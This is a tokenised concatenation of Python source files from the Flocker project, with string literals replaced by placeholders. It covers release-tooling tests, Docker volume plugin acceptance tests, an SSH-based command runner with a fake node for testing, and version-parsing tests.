<EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) ) <EOL> class CalculateBaseBranchTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( CalculateBaseBranchTests , self ) . setUp ( ) <EOL> self . repo = create_git_repository ( test_case = self ) <EOL> def calculate_base_branch ( self , version ) : <EOL> return calculate_base_branch ( <EOL> version = version , path = self . repo . working_dir ) <EOL> def test_calculate_base_branch_for_non_release_fails ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> NotARelease , <EOL> self . calculate_base_branch , '<STR_LIT>' ) <EOL> def test_weekly_release_base ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> self . calculate_base_branch ( version = '<STR_LIT>' ) . name , <EOL> "<STR_LIT>" ) <EOL> def test_first_pre_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> self . calculate_base_branch ( version = '<STR_LIT>' ) . name , <EOL> "<STR_LIT>" ) <EOL> def test_unparseable_tags ( self ) : <EOL> """<STR_LIT>""" <EOL> self . repo . create_head ( '<STR_LIT>' ) <EOL> self . repo . create_tag ( '<STR_LIT>' ) <EOL> self . repo . create_head ( '<STR_LIT>' ) <EOL> self . repo . create_tag ( '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> self . calculate_base_branch ( version = '<STR_LIT>' ) . name , <EOL> "<STR_LIT>" ) <EOL> def test_parent_repository_used ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> calculate_base_branch ( <EOL> version = '<STR_LIT>' , <EOL> path = FilePath ( self . repo . working_dir ) . child ( '<STR_LIT>' ) . path , <EOL> ) . name , <EOL> "<STR_LIT>" ) <EOL> def test_tag_exists_fails ( self ) : <EOL> """<STR_LIT>""" <EOL> self . repo . create_tag ( '<STR_LIT>' ) <EOL> self . assertRaises ( <EOL> TagExists , <EOL> self . calculate_base_branch , '<STR_LIT>' ) <EOL> def test_branch_only_exists_remote ( self ) : <EOL> """<STR_LIT>""" <EOL> self . repo . create_head ( '<STR_LIT>' ) <EOL> self . repo . create_tag ( '<STR_LIT>' ) <EOL> directory = FilePath ( self . mktemp ( ) ) <EOL> clone = self . repo . clone ( path = directory . path ) <EOL> self . assertEqual ( <EOL> calculate_base_branch ( <EOL> version = '<STR_LIT>' , <EOL> path = clone . working_dir ) . name , <EOL> "<STR_LIT>" ) <EOL> class UpdateLicenseFileTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_update_license_file ( self ) : <EOL> """<STR_LIT>""" <EOL> top_level = FilePath ( self . mktemp ( ) ) <EOL> top_level . child ( '<STR_LIT>' ) . makedirs ( ) <EOL> top_level . child ( '<STR_LIT>' ) . child ( '<STR_LIT>' ) . setContent ( <EOL> "<STR_LIT>" ) <EOL> update_license_file ( args = [ ] , top_level = top_level , year = <NUM_LIT> ) <EOL> self . assertEqual ( <EOL> top_level . child ( '<STR_LIT>' ) . getContent ( ) , <EOL> "<STR_LIT>" <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from . no_load import NoLoadScenario <EOL> from . read_request_load import read_request_load_scenario <EOL> from . write_request_load import ( <EOL> write_request_load_scenario , DatasetCreationTimeout , <EOL> ) <EOL> from . _request_load import ( <EOL> RequestRateTooLow , RequestRateNotReached , RequestOverload , NoNodesFound , <EOL> RequestScenarioAlreadyStarted , <EOL> ) <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> from distutils . version import LooseVersion <EOL> from twisted . internet import reactor <EOL> from twisted . internet . defer import gatherResults <EOL> from hypothesis . strategies import integers <EOL> from bitmath import GiB <EOL> from eliot import Message <EOL> from ... common import loop_until <EOL> from ... common . runner import run_ssh <EOL> from ... dockerplugin . test . test_api import volume_expression <EOL> from ... testtools import AsyncTestCase , random_name , flaky , async_runner <EOL> from . . testtools import ( <EOL> require_cluster , post_http_server , assert_http_server , <EOL> get_docker_client , verify_socket , check_http_server , <EOL> extract_external_port , <EOL> create_dataset , require_moving_backend , ACCEPTANCE_TEST_TIMEOUT <EOL> ) <EOL> from . . scripts import SCRIPTS <EOL> from ... node import backends <EOL> from ... node . agents . ebs import EBSMandatoryProfileAttributes <EOL> class DockerPluginTests ( AsyncTestCase ) : <EOL> """<STR_LIT>""" <EOL> run_tests_with = async_runner ( timeout = ACCEPTANCE_TEST_TIMEOUT ) <EOL> def require_docker ( self , required_version , cluster ) : <EOL> """<STR_LIT>""" <EOL> client = get_docker_client ( cluster , cluster . nodes [ <NUM_LIT:0> ] . public_address ) <EOL> client_version = LooseVersion ( client . version ( ) [ '<STR_LIT>' ] ) <EOL> minimum_version = LooseVersion ( required_version ) <EOL> if client_version < minimum_version : <EOL> self . skipTest ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( minimum_version , client_version ) <EOL> ) <EOL> def docker_service ( self , address , action ) : <EOL> """<STR_LIT>""" <EOL> distro = [ ] <EOL> get_distro = run_ssh ( <EOL> reactor , b"<STR_LIT:root>" , address , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> handle_stdout = distro . append ) <EOL> get_distro . addCallback ( lambda _ : distro [ <NUM_LIT:0> ] . lower ( ) ) <EOL> def action_docker ( distribution ) : <EOL> if '<STR_LIT>' in distribution : <EOL> command = [ "<STR_LIT>" , "<STR_LIT>" , action ] <EOL> else : <EOL> command = [ "<STR_LIT>" , action , "<STR_LIT>" ] <EOL> d = run_ssh ( reactor , b"<STR_LIT:root>" , address , command ) <EOL> def handle_error ( _ , action ) : <EOL> self . fail ( <EOL> "<STR_LIT>" . format ( <EOL> action ) ) <EOL> d . addErrback ( handle_error , action ) <EOL> return d <EOL> acting = get_distro . addCallback ( action_docker ) <EOL> return acting <EOL> def run_python_container ( self , cluster , address , docker_arguments , script , <EOL> script_arguments , cleanup = True , client = None ) : <EOL> """<STR_LIT>""" <EOL> if client is None : <EOL> client = get_docker_client ( cluster , address ) <EOL> for container in client . containers ( ) : <EOL> client . remove_container ( container [ "<STR_LIT>" ] , force = True ) <EOL> container = client . create_container ( <EOL> "<STR_LIT>" , <EOL> [ "<STR_LIT>" , "<STR_LIT:-c>" , script . getContent ( ) ] + list ( script_arguments ) , <EOL> volume_driver = "<STR_LIT>" , ** docker_arguments ) <EOL> cid = container [ "<STR_LIT>" ] <EOL> client . start ( container = cid ) <EOL> if cleanup : <EOL> self . addCleanup ( client . remove_container , cid , force = True ) <EOL> return cid <EOL> def _create_volume ( self , client , name , driver_opts ) : <EOL> """<STR_LIT>""" <EOL> result = client . create_volume ( name , u'<STR_LIT>' , driver_opts ) <EOL> self . addCleanup ( client . remove_volume , name ) <EOL> return result <EOL> def _test_sized_vol_container ( self , cluster , node ) : <EOL> """<STR_LIT>""" <EOL> client = get_docker_client ( cluster , node . public_address ) <EOL> volume_name = random_name ( self ) <EOL> size = integers ( min_value = <NUM_LIT> , max_value = <NUM_LIT:100> ) . example ( ) <EOL> expression = volume_expression . example ( ) <EOL> size_opt = "<STR_LIT>" . join ( str ( size ) ) + expression <EOL> size_bytes = int ( GiB ( size ) . to_Byte ( ) . value ) <EOL> self . _create_volume ( client , volume_name , <EOL> driver_opts = { '<STR_LIT:size>' : size_opt } ) <EOL> http_port = <NUM_LIT> <EOL> container_identifier = self . run_python_container ( <EOL> cluster , node . public_address , <EOL> { "<STR_LIT>" : client . create_host_config ( <EOL> binds = [ "<STR_LIT>" . format ( volume_name ) ] , <EOL> port_bindings = { http_port : <NUM_LIT:0> } , <EOL> restart_policy = { "<STR_LIT:Name>" : "<STR_LIT>" } , <EOL> privileged = True ) , <EOL> "<STR_LIT>" : [ http_port ] } , <EOL> SCRIPTS . child ( b"<STR_LIT>" ) , <EOL> [ u"<STR_LIT>" ] , client = client ) <EOL> host_port = extract_external_port ( <EOL> client , container_identifier , http_port , <EOL> ) <EOL> d = assert_http_server ( <EOL> self , node . public_address , host_port , <EOL> expected_response = str ( size_bytes ) ) <EOL> def _get_datasets ( unused_arg ) : <EOL> return cluster . client . list_datasets_configuration ( ) <EOL> d . addCallback ( _get_datasets ) <EOL> def _verify_volume_metadata_size ( datasets ) : <EOL> dataset = next ( d for d in datasets <EOL> if d . metadata . get ( u'<STR_LIT:name>' ) == volume_name ) <EOL> self . assertEqual ( int ( dataset . metadata . get ( u'<STR_LIT>' ) ) , <EOL> size_bytes ) <EOL> d . addCallback ( _verify_volume_metadata_size ) <EOL> return d <EOL> @ require_cluster ( <NUM_LIT:1> ) <EOL> def test_create_sized_volume_with_v2_plugin_api ( self , cluster ) : <EOL> """<STR_LIT>""" <EOL> self . require_docker ( '<STR_LIT>' , cluster ) <EOL> return self . _test_sized_vol_container ( cluster , cluster . nodes [ <NUM_LIT:0> ] ) <EOL> def _test_create_container ( self , cluster , volume_name = None ) : <EOL> """<STR_LIT>""" <EOL> data = random_name ( self ) . encode ( "<STR_LIT:utf-8>" ) <EOL> node = cluster . nodes [ <NUM_LIT:0> ] <EOL> client = get_docker_client ( cluster , node . public_address ) <EOL> http_port = <NUM_LIT> <EOL> if volume_name is None : <EOL> volume_name = random_name ( self ) <EOL> container_identifier = self . run_python_container ( <EOL> cluster , node . public_address , <EOL> { "<STR_LIT>" : client . create_host_config ( <EOL> binds = [ "<STR_LIT>" . format ( volume_name ) ] , <EOL> port_bindings = { http_port : <NUM_LIT:0> } , <EOL> restart_policy = { "<STR_LIT:Name>" : "<STR_LIT>" } ) , <EOL> "<STR_LIT>" : [ http_port ] } , <EOL> SCRIPTS . child ( b"<STR_LIT>" ) , <EOL> [ u"<STR_LIT>" ] , client = client ) <EOL> host_port = extract_external_port ( <EOL> client , container_identifier , http_port <EOL> ) <EOL> d = post_http_server ( self , node . public_address , host_port , <EOL> { "<STR_LIT:data>" : data } ) <EOL> d . addCallback ( lambda _ : assert_http_server ( <EOL> self , node . public_address , host_port , expected_response = data ) ) <EOL> return d <EOL> @ flaky ( u'<STR_LIT>' ) <EOL> @ require_cluster ( <NUM_LIT:1> ) <EOL> def test_create_container_with_v2_plugin_api ( self , cluster ) : <EOL> """<STR_LIT>""" <EOL> self . require_docker ( '<STR_LIT>' , cluster ) <EOL> return self . _test_create_container ( cluster ) <EOL> @ require_cluster ( <NUM_LIT:1> , required_backend = backends . AWS ) <EOL> def test_create_silver_volume_with_v2_plugin_api ( self , cluster , backend ) : <EOL> """<STR_LIT>""" <EOL> self . require_docker ( '<STR_LIT>' , cluster ) <EOL> node = cluster . nodes [ <NUM_LIT:0> ] <EOL> docker = get_docker_client ( cluster , node . public_address ) <EOL> volume_name = random_name ( self ) <EOL> self . _create_volume ( docker , volume_name , <EOL> driver_opts = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> create_container = self . _test_create_container ( cluster , <EOL> volume_name = volume_name ) <EOL> def _get_datasets ( unused_arg ) : <EOL> return cluster . client . list_datasets_configuration ( ) <EOL> create_container . addCallback ( _get_datasets ) <EOL> def _verify_created_volume_is_silver ( datasets ) : <EOL> dataset = next ( d for d in datasets <EOL> if d . metadata . get ( u'<STR_LIT:name>' ) == volume_name ) <EOL> volumes = backend . list_volumes ( ) <EOL> volume = next ( v for v in volumes <EOL> if v . dataset_id == dataset . dataset_id ) <EOL> ebs_volume = backend . _get_ebs_volume ( volume . blockdevice_id ) <EOL> self . assertEqual ( <EOL> EBSMandatoryProfileAttributes . SILVER . value . volume_type . value , <EOL> ebs_volume . volume_type ) <EOL> create_container . addCallback ( _verify_created_volume_is_silver ) <EOL> return create_container <EOL> @ require_cluster ( <NUM_LIT:1> ) <EOL> def test_volume_persists_restart ( self , cluster ) : <EOL> """<STR_LIT>""" <EOL> data = random_name ( self ) . encode ( "<STR_LIT:utf-8>" ) <EOL> node = cluster . nodes [ <NUM_LIT:0> ] <EOL> Message . new ( <EOL> message_type = u"<STR_LIT>" , <EOL> node = node . public_address , <EOL> ) . write ( ) <EOL> client = get_docker_client ( cluster , node . public_address ) <EOL> http_port = <NUM_LIT> <EOL> volume_name = random_name ( self ) <EOL> container_identifier = self . run_python_container ( <EOL> cluster , node . public_address , <EOL> { "<STR_LIT>" : client . create_host_config ( <EOL> binds = [ "<STR_LIT>" . format ( volume_name ) ] , <EOL> port_bindings = { http_port : <NUM_LIT:0> } , <EOL> restart_policy = { "<STR_LIT:Name>" : "<STR_LIT>" } ) , <EOL> "<STR_LIT>" : [ http_port ] } , <EOL> SCRIPTS . child ( b"<STR_LIT>" ) , <EOL> [ u"<STR_LIT>" ] , client = client ) <EOL> host_port = extract_external_port ( <EOL> client , container_identifier , http_port <EOL> ) <EOL> d = post_http_server ( self , node . public_address , host_port , <EOL> { "<STR_LIT:data>" : data } ) <EOL> d . addCallback ( lambda _ : assert_http_server ( <EOL> self , node . public_address , host_port , expected_response = data ) ) <EOL> d . addCallback ( lambda _ : self . docker_service ( <EOL> node . public_address , b"<STR_LIT>" ) ) <EOL> def poll_http_server_stopped ( _ ) : <EOL> def http_closed ( ) : <EOL> ds = check_http_server ( node . public_address , host_port ) <EOL> ds . addCallback ( lambda succeeded : not succeeded ) <EOL> return ds <EOL> looping = loop_until ( reactor , http_closed ) <EOL> return looping <EOL> d . addCallback ( poll_http_server_stopped ) <EOL> d . addCallback ( lambda _ : self . docker_service ( <EOL> node . public_address , b"<STR_LIT:start>" ) ) <EOL> d . addCallback ( lambda _ : extract_external_port ( <EOL> client , container_identifier , http_port , <EOL> ) ) <EOL> def poll_http_server ( host_port ) : <EOL> ds = verify_socket ( node . public_address , host_port ) <EOL> ds . addCallback ( lambda _ : assert_http_server ( <EOL> self , node . public_address , host_port , expected_response = data ) <EOL> ) <EOL> return ds <EOL> d . addCallback ( poll_http_server ) <EOL> return d <EOL> @ require_cluster ( <NUM_LIT:1> ) <EOL> def test_run_container_with_volume ( self , cluster ) : <EOL> """<STR_LIT>""" <EOL> return self . _test_create_container ( cluster ) <EOL> @ require_cluster ( <NUM_LIT:1> ) <EOL> def test_run_container_with_preexisting_volume ( self , cluster ) : <EOL> """<STR_LIT>""" <EOL> name = random_name ( self ) <EOL> d = create_dataset ( self , cluster , metadata = { u"<STR_LIT:name>" : name } ) <EOL> d . addCallback ( lambda _ : self . _test_create_container ( <EOL> cluster , volume_name = name ) ) <EOL> return d <EOL> def _test_move ( self , cluster , origin_node , destination_node ) : <EOL> """<STR_LIT>""" <EOL> origin_client = get_docker_client ( cluster , origin_node . public_address ) <EOL> data = "<STR_LIT>" <EOL> http_port = <NUM_LIT> <EOL> volume_name = random_name ( self ) <EOL> container_args = { <EOL> "<STR_LIT>" : origin_client . create_host_config ( <EOL> binds = [ "<STR_LIT>" . format ( volume_name ) ] , <EOL> port_bindings = { http_port : <NUM_LIT:0> } ) , <EOL> "<STR_LIT>" : [ http_port ] } <EOL> cid = self . run_python_container ( <EOL> cluster , origin_node . public_address , container_args , <EOL> SCRIPTS . child ( b"<STR_LIT>" ) , <EOL> [ u"<STR_LIT>" ] , cleanup = False , client = origin_client ) <EOL> host_port = extract_external_port ( origin_client , cid , http_port ) <EOL> d = post_http_server ( self , origin_node . public_address , host_port , <EOL> { "<STR_LIT:data>" : data } ) <EOL> def posted ( _ ) : <EOL> origin_client . remove_container ( cid , force = True ) <EOL> new_cid = self . run_python_container ( <EOL> cluster , destination_node . public_address , container_args , <EOL> SCRIPTS . child ( b"<STR_LIT>" ) , [ u"<STR_LIT>" ] , <EOL> ) <EOL> destination_client = get_docker_client ( <EOL> cluster , destination_node . public_address , <EOL> ) <EOL> host_port = extract_external_port ( <EOL> destination_client , new_cid , http_port , <EOL> ) <EOL> return host_port <EOL> d . addCallback ( posted ) <EOL> d . addCallback ( <EOL> lambda host_port : assert_http_server ( <EOL> self , destination_node . public_address , host_port , <EOL> expected_response = data , <EOL> ) <EOL> ) <EOL> return d <EOL> @ flaky ( u'<STR_LIT>' ) <EOL> @ require_cluster ( <NUM_LIT:1> ) <EOL> def test_move_volume_single_node ( self , cluster ) : <EOL> """<STR_LIT>""" <EOL> return self . _test_move ( cluster , cluster . nodes [ <NUM_LIT:0> ] , cluster . nodes [ <NUM_LIT:0> ] ) <EOL> @ require_moving_backend <EOL> @ flaky ( u'<STR_LIT>' ) <EOL> @ require_cluster ( <NUM_LIT:2> ) <EOL> def test_move_volume_different_node ( self , cluster ) : <EOL> """<STR_LIT>""" <EOL> return self . _test_move ( cluster , cluster . nodes [ <NUM_LIT:0> ] , cluster . nodes [ <NUM_LIT:1> ] ) <EOL> @ require_cluster ( <NUM_LIT:1> ) <EOL> def test_inspect ( self , cluster ) : <EOL> """<STR_LIT>""" <EOL> self . require_docker ( '<STR_LIT>' , cluster ) <EOL> name = random_name ( self ) <EOL> d = create_dataset ( self , cluster , metadata = { u"<STR_LIT:name>" : name } ) <EOL> def created ( _ ) : <EOL> client = get_docker_client ( <EOL> cluster , cluster . nodes [ <NUM_LIT:0> ] . public_address ) <EOL> info = client . inspect_volume ( name ) <EOL> self . assertEqual ( ( info [ u"<STR_LIT>" ] , info [ u"<STR_LIT:Name>" ] ) , <EOL> ( u"<STR_LIT>" , name ) ) <EOL> d . addCallback ( created ) <EOL> return d <EOL> @ require_cluster ( <NUM_LIT:1> ) <EOL> def test_listed ( self , cluster ) : <EOL> """<STR_LIT>""" <EOL> self . require_docker ( '<STR_LIT>' , cluster ) <EOL> name = random_name ( self ) <EOL> name2 = random_name ( self ) <EOL> d = gatherResults ( [ <EOL> create_dataset ( self , cluster , metadata = { u"<STR_LIT:name>" : name } ) , <EOL> create_dataset ( self , cluster , metadata = { u"<STR_LIT:name>" : name2 } ) ] ) <EOL> def created ( _ ) : <EOL> client = get_docker_client ( <EOL> cluster , cluster . nodes [ <NUM_LIT:0> ] . public_address ) <EOL> our_volumes = [ v for v in client . volumes ( ) [ u"<STR_LIT>" ] <EOL> if v [ u"<STR_LIT:Name>" ] in ( name , name2 ) ] <EOL> self . assertEqual ( [ v [ u"<STR_LIT>" ] for v in our_volumes ] , <EOL> [ u"<STR_LIT>" , u"<STR_LIT>" ] ) <EOL> self . assertItemsEqual ( <EOL> [ v [ u"<STR_LIT:Name>" ] for v in our_volumes ] , [ name , name2 ] ) <EOL> d . addCallback ( created ) <EOL> return d </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from subprocess import Popen , PIPE , check_output , CalledProcessError <EOL> from contextlib import contextmanager <EOL> from io import BytesIO <EOL> from threading import current_thread <EOL> from pipes import quote <EOL> from zope . interface import Interface , implementer <EOL> from characteristic import with_cmp , with_repr <EOL> class INode ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def run ( remote_command ) : <EOL> """<STR_LIT>""" <EOL> def get_output ( remote_command ) : <EOL> """<STR_LIT>""" <EOL> @ with_cmp ( [ "<STR_LIT>" ] ) <EOL> @ with_repr ( [ "<STR_LIT>" ] ) <EOL> @ implementer ( INode ) <EOL> class ProcessNode ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , initial_command_arguments , quote = lambda d : d ) : <EOL> """<STR_LIT>""" <EOL> self . initial_command_arguments = tuple ( initial_command_arguments ) <EOL> self . _quote = quote <EOL> @ contextmanager <EOL> def run ( self , remote_command ) : <EOL> process = Popen ( <EOL> self . initial_command_arguments + <EOL> tuple ( map ( self . _quote , remote_command ) ) , <EOL> stdin = PIPE ) <EOL> try : <EOL> yield process . stdin <EOL> finally : <EOL> process . stdin . close ( ) <EOL> exit_code = process . wait ( ) <EOL> if exit_code : <EOL> raise IOError ( "<STR_LIT>" , remote_command , exit_code ) <EOL> def get_output ( self , remote_command ) : <EOL> try : <EOL> return check_output ( <EOL> self . initial_command_arguments + <EOL> tuple ( map ( self . _quote , remote_command ) ) ) <EOL> except CalledProcessError as e : <EOL> raise IOError ( "<STR_LIT>" , remote_command , e . returncode , e . output ) <EOL> @ classmethod <EOL> def using_ssh ( cls , host , port , username , private_key ) : <EOL> """<STR_LIT>""" <EOL> return cls ( initial_command_arguments = ( <EOL> b"<STR_LIT>" , <EOL> b"<STR_LIT>" , <EOL> b"<STR_LIT>" , private_key . path , <EOL> b"<STR_LIT>" , username , <EOL> b"<STR_LIT>" , b"<STR_LIT>" , <EOL> b"<STR_LIT>" , b"<STR_LIT>" , <EOL> b"<STR_LIT>" , b"<STR_LIT>" , <EOL> b"<STR_LIT>" , b"<STR_LIT>" % ( port , ) , host ) , quote = quote ) <EOL> @ implementer ( INode ) <EOL> class FakeNode ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , outputs = ( ) ) : <EOL> """<STR_LIT>""" <EOL> self . _outputs = list ( outputs ) <EOL> @ contextmanager <EOL> def run ( self , remote_command ) : <EOL> """<STR_LIT>""" <EOL> self . thread_id = current_thread ( ) . ident <EOL> self . stdin = BytesIO ( ) <EOL> self . remote_command = remote_command <EOL> yield self . stdin <EOL> self . stdin . seek ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> def get_output ( self , remote_command ) : <EOL> """<STR_LIT>""" <EOL> self . thread_id = current_thread ( ) . ident <EOL> self . remote_command = remote_command <EOL> result = self . _outputs . pop ( <NUM_LIT:0> ) <EOL> if isinstance ( result , Exception ) : <EOL> raise result <EOL> else : <EOL> return result </s>
<s> """<STR_LIT>""" <EOL> from unittest import skipIf , skipUnless <EOL> try : <EOL> from packaging . version import Version as PEP440Version <EOL> PACKAGING_INSTALLED = True <EOL> except ImportError : <EOL> PACKAGING_INSTALLED = False <EOL> from pyrsistent import PClass , field <EOL> from . . version import ( <EOL> parse_version , FlockerVersion , <EOL> get_doc_version , get_installable_version , get_pre_release , <EOL> get_package_key_suffix , <EOL> is_pre_release , is_release , is_weekly_release , <EOL> target_release , <EOL> NotAPreRelease , UnparseableVersion , <EOL> ) <EOL> from flocker . common . version import RPMVersion , make_rpm_version <EOL> from flocker . testtools import TestCase <EOL> class MakeRpmVersionTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_good ( self ) : <EOL> """<STR_LIT>""" <EOL> expected = { <EOL> '<STR_LIT>' : RPMVersion ( version = '<STR_LIT>' , release = '<STR_LIT:1>' ) , <EOL> '<STR_LIT>' : RPMVersion ( <EOL> version = '<STR_LIT>' , release = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : RPMVersion ( version = '<STR_LIT>' , release = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : RPMVersion ( version = '<STR_LIT>' , release = '<STR_LIT:1>' ) , <EOL> '<STR_LIT>' : RPMVersion ( version = '<STR_LIT>' , release = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <EOL> RPMVersion ( version = '<STR_LIT>' , release = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : RPMVersion ( <EOL> version = '<STR_LIT>' , release = '<STR_LIT>' ) , <EOL> } <EOL> unexpected_results = [ ] <EOL> for supplied_version , expected_rpm_version in expected . items ( ) : <EOL> actual_rpm_version = make_rpm_version ( supplied_version ) <EOL> if actual_rpm_version != expected_rpm_version : <EOL> unexpected_results . append ( ( <EOL> supplied_version , <EOL> actual_rpm_version , <EOL> expected_rpm_version , <EOL> ) ) <EOL> if unexpected_results : <EOL> self . fail ( unexpected_results ) <EOL> def test_non_integer_suffix ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( UnparseableVersion , make_rpm_version , '<STR_LIT>' ) <EOL> class InvalidVersionTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_invalid_Version ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( UnparseableVersion , parse_version , '<STR_LIT>' ) <EOL> class VersionCase ( PClass ) : <EOL> """<STR_LIT>""" <EOL> version = field ( bytes , mandatory = True ) <EOL> flocker_version = field ( FlockerVersion , mandatory = True ) <EOL> doc_version = field ( bytes , mandatory = True ) <EOL> installable_version = field ( bytes , mandatory = True ) <EOL> is_release = field ( bool , mandatory = True ) <EOL> is_weekly_release = field ( bool , mandatory = True ) <EOL> is_pre_release = field ( bool , mandatory = True ) <EOL> is_legacy = field ( bool , mandatory = True , initial = False ) <EOL> def build_version_test ( name , version_case ) : <EOL> """<STR_LIT>""" <EOL> class Tests ( TestCase ) : <EOL> def test_flocker_version ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> parse_version ( version_case . version ) , <EOL> version_case . flocker_version , <EOL> "<STR_LIT>" , <EOL> ) <EOL> def test_doc_version ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> get_doc_version ( version_case . version ) , <EOL> version_case . doc_version , <EOL> "<STR_LIT>" , <EOL> ) <EOL> @ skipIf ( <EOL> version_case . is_legacy , <EOL> "<STR_LIT>" ) <EOL> def test_installable_version ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> get_installable_version ( version_case . version ) , <EOL> version_case . installable_version , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , ) <EOL> def test_is_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> is_release ( version_case . version ) , <EOL> version_case . is_release , <EOL> ) <EOL> def test_is_weekly_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> is_weekly_release ( version_case . version ) , <EOL> version_case . is_weekly_release , <EOL> ) <EOL> def test_is_pre_release ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> is_pre_release ( version_case . version ) , <EOL> version_case . is_pre_release , <EOL> ) <EOL> @ skipUnless ( PACKAGING_INSTALLED , "<STR_LIT>" ) <EOL> def test_pep_440 ( self ) : <EOL> """<STR_LIT>""" <EOL> PEP440Version ( version_case . version ) <EOL> @ skipUnless ( PACKAGING_INSTALLED , "<STR_LIT>" ) <EOL> @ skipIf ( version_case . is_legacy , "<STR_LIT>" ) <EOL> def test_normalization ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> version_case . version , <EOL> str ( PEP440Version ( version_case . version ) ) , <EOL> "<STR_LIT>" , <EOL> ) <EOL> Tests . __name__ = name <EOL> return Tests <EOL> MarketingVersionTests = build_version_test ( <EOL> "<STR_LIT>" , <EOL> VersionCase ( <EOL> version = b'<STR_LIT>' , <EOL> flocker_version = FlockerVersion ( <EOL> major = b'<STR_LIT:0>' , <EOL> minor = b'<STR_LIT:3>' , <EOL> micro = b'<STR_LIT:2>' , <EOL> ) , <EOL> doc_version = b'<STR_LIT>' , <EOL> installable_version = b'<STR_LIT>' , <EOL> is_release = True , <EOL> is_weekly_release = False , <EOL> is_pre_release = False , <EOL> ) , <EOL> ) <EOL> WeeklyReleaseTests = build_version_test ( <EOL> "<STR_LIT>" , <EOL> VersionCase ( <EOL> version = b'<STR_LIT>' , <EOL> flocker_version = FlockerVersion ( <EOL> major = b'<STR_LIT:0>' , <EOL> minor = b'<STR_LIT:3>' , <EOL> micro = b'<STR_LIT:2>' , <EOL> weekly_release = b'<STR_LIT:1>' , <EOL> ) , <EOL> doc_version = b'<STR_LIT>' , <EOL> installable_version = b'<STR_LIT>' , <EOL> is_release = False , <EOL> is_weekly_release = True , <EOL> is_pre_release = False , <EOL> ) , <EOL> ) <EOL> PreReleaseTests = build_version_test ( <EOL> "<STR_LIT>" , <EOL> VersionCase ( <EOL> version = b'<STR_LIT>' , <EOL> flocker_version = FlockerVersion ( <EOL> major = b'<STR_LIT:0>' , <EOL> minor = b'<STR_LIT:3>' , <EOL> micro = b'<STR_LIT:2>' , <EOL> pre_release = b'<STR_LIT:1>' , <EOL> ) , <EOL> doc_version = b'<STR_LIT>' , <EOL> installable_version = b'<STR_LIT>' , <EOL> is_release = False , <EOL> is_weekly_release = False , <EOL> is_pre_release = True , <EOL> ) , <EOL> ) <EOL> DevelopmentVersionTests = build_version_test ( <EOL> "<STR_LIT>" , <EOL> VersionCase ( <EOL> version = b'<STR_LIT>' , <EOL> flocker_version = FlockerVersion ( <EOL> major = b'<STR_LIT:0>' , <EOL> minor = b'<STR_LIT:3>' , <EOL> micro = b'<STR_LIT:2>' , <EOL> commit_count = b'<STR_LIT:1>' , <EOL> commit_hash = b'<STR_LIT>' , <EOL> ) , <EOL> doc_version = b'<STR_LIT>' , <EOL> installable_version = b'<STR_LIT>' , <EOL> is_release = False , <EOL> is_weekly_release = False , <EOL> is_pre_release = False , <EOL> ) , <EOL> ) <EOL> DirtyVersionTests = build_version_test ( <EOL> "<STR_LIT>" , <EOL> VersionCase ( <EOL> version = b'<STR_LIT>' , <EOL> flocker_version = FlockerVersion ( <EOL> major = b'<STR_LIT:0>' , <EOL> minor = b'<STR_LIT:3>' , <EOL> micro = b'<STR_LIT:2>' , <EOL> commit_count = b'<STR_LIT:1>' , <EOL> commit_hash = b'<STR_LIT>' , <EOL> dirty = b'<STR_LIT>' , <EOL> ) , <EOL> doc_version = b'<STR_LIT>' , <EOL> installable_version = b'<STR_LIT>' , <EOL> is_release = False , <EOL> is_weekly_release = False , <EOL> is_pre_release = False , <EOL> ) , <EOL> ) <EOL> DocReleaseTests = build_version_test ( <EOL> "<STR_LIT>" , <EOL> VersionCase ( <EOL> version = b'<STR_LIT>' , <EOL> flocker_version = FlockerVersion ( <EOL> major = b'<STR_LIT:0>' , <EOL> minor = b'<STR_LIT:3>' , <EOL> micro = b'<STR_LIT:2>' , <EOL> documentation_revision = b'<STR_LIT>' , <EOL> ) , <EOL> doc_version = b'<STR_LIT>' , <EOL> installable_version = b'<STR_LIT>' , <EOL> is_release = True , <EOL> 